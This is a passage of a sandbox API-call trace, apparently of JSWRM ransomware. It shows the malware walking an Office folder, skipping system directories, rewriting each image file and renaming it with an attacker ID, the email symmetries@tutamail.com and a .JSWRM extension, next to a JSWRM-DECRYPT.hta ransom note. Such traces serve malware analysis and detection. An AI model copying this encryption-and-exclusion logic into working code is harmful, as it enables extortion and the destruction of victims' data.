CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIP.JPG", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRIP.JPG", lpUsedDefaultChar=0x0) returned 8 [0130.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\GRIP.JPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\grip.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.958] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7465) returned 1 [0130.958] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.958] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x1d20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x1d20, lpOverlapped=0x0) returned 1 [0130.960] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.960] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x1d20, lpOverlapped=0x0) returned 1 [0130.960] CloseHandle (hObject=0x314) returned 1 [0130.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\GRIP.JPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\grip.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\GRIP.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\grip.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.961] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1977e6ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="GRIPMASK.BMP", cAlternateFileName="")) returned 1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2=".") returned 1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="..") returned 1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="...") returned 1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="windows") returned -1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="recovery") returned -1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="perflogs") returned -1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="documents and settings") returned 1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="$RECYCLE.BIN") returned 1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="system volume information") returned -1 [0130.961] lstrcmpiW (lpString1="GRIPMASK.BMP", lpString2="msocache") returned -1 [0130.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIPMASK.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIPMASK.BMP", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRIPMASK.BMP", lpUsedDefaultChar=0x0) returned 12 [0130.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIPMASK.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIPMASK.BMP", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRIPMASK.BMP", lpUsedDefaultChar=0x0) returned 12 [0130.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\GRIPMASK.BMP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\gripmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.962] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3128) returned 1 [0130.962] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.962] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xc30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xc30, lpOverlapped=0x0) returned 1 [0130.966] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.966] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xc30, lpOverlapped=0x0) returned 1 [0130.966] CloseHandle (hObject=0x314) returned 1 [0130.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\GRIPMASK.BMP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\gripmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\GRIPMASK.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\gripmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.967] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1977e6ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="InformationIcon.jpg", cAlternateFileName="INFORM~1.JPG")) returned 1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2=".") returned 1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="..") returned 1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="...") returned 1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="windows") returned -1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="recovery") returned -1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="perflogs") returned -1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="documents and settings") returned 1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="$RECYCLE.BIN") returned 1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="system volume information") returned -1 [0130.967] lstrcmpiW (lpString1="InformationIcon.jpg", lpString2="msocache") returned -1 [0130.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIcon.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0130.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIcon.jpg", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InformationIcon.jpg", lpUsedDefaultChar=0x0) returned 19 [0130.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIcon.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0130.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIcon.jpg", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InformationIcon.jpg", lpUsedDefaultChar=0x0) returned 19 [0130.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\InformationIcon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\informationicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.969] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3045) returned 1 [0130.969] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.969] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbe0, lpOverlapped=0x0) returned 1 [0130.971] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.971] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbe0, lpOverlapped=0x0) returned 1 [0130.971] CloseHandle (hObject=0x314) returned 1 [0130.971] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\InformationIcon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\informationicon.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\InformationIcon.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\informationicon.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.973] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="InformationIconMask.bmp", cAlternateFileName="INFORM~1.BMP")) returned 1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2=".") returned 1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="..") returned 1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="...") returned 1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="windows") returned -1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="recovery") returned -1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="perflogs") returned -1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="documents and settings") returned 1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="system volume information") returned -1 [0130.973] lstrcmpiW (lpString1="InformationIconMask.bmp", lpString2="msocache") returned -1 [0130.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIconMask.bmp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0130.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIconMask.bmp", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InformationIconMask.bmp", lpUsedDefaultChar=0x0) returned 23 [0130.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIconMask.bmp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0130.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InformationIconMask.bmp", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InformationIconMask.bmp", lpUsedDefaultChar=0x0) returned 23 [0130.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\InformationIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\informationiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.974] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2104) returned 1 [0130.974] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.974] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x830, lpOverlapped=0x0) returned 1 [0130.976] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.976] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x830, lpOverlapped=0x0) returned 1 [0130.976] CloseHandle (hObject=0x314) returned 1 [0130.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\InformationIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\informationiconmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\InformationIconMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\informationiconmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.977] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44b5fa6c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44b5fa6c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44b5fa6c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.977] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x190c9cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x190c9cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197321ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xceed, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="LoginDialogBackground.jpg", cAlternateFileName="LOGIND~1.JPG")) returned 1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2=".") returned 1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="..") returned 1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="...") returned 1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="windows") returned -1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="recovery") returned -1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="perflogs") returned -1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="documents and settings") returned 1 [0130.977] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="$RECYCLE.BIN") returned 1 [0130.978] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="system volume information") returned -1 [0130.978] lstrcmpiW (lpString1="LoginDialogBackground.jpg", lpString2="msocache") returned -1 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginDialogBackground.jpg", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginDialogBackground.jpg", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginDialogBackground.jpg", lpUsedDefaultChar=0x0) returned 25 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginDialogBackground.jpg", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginDialogBackground.jpg", cchWideChar=25, lpMultiByteStr=0x2411f0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginDialogBackground.jpg", lpUsedDefaultChar=0x0) returned 25 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginDialogBackground.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logindialogbackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.978] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=52973) returned 1 [0130.978] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.979] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xcee0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xcee0, lpOverlapped=0x0) returned 1 [0130.984] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.984] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xcee0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xcee0, lpOverlapped=0x0) returned 1 [0130.984] CloseHandle (hObject=0x314) returned 1 [0130.984] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginDialogBackground.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logindialogbackground.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\LoginDialogBackground.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\logindialogbackground.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.986] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x190c9cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x190c9cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e93, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="LoginTool24x24Images.jpg", cAlternateFileName="LOGINT~1.JPG")) returned 1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2=".") returned 1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="..") returned 1 [0130.986] lstrcmpiW (lpString1="LoginTool24x24Images.jpg", lpString2="...") returned 1 [0130.986] lstrcmpiW 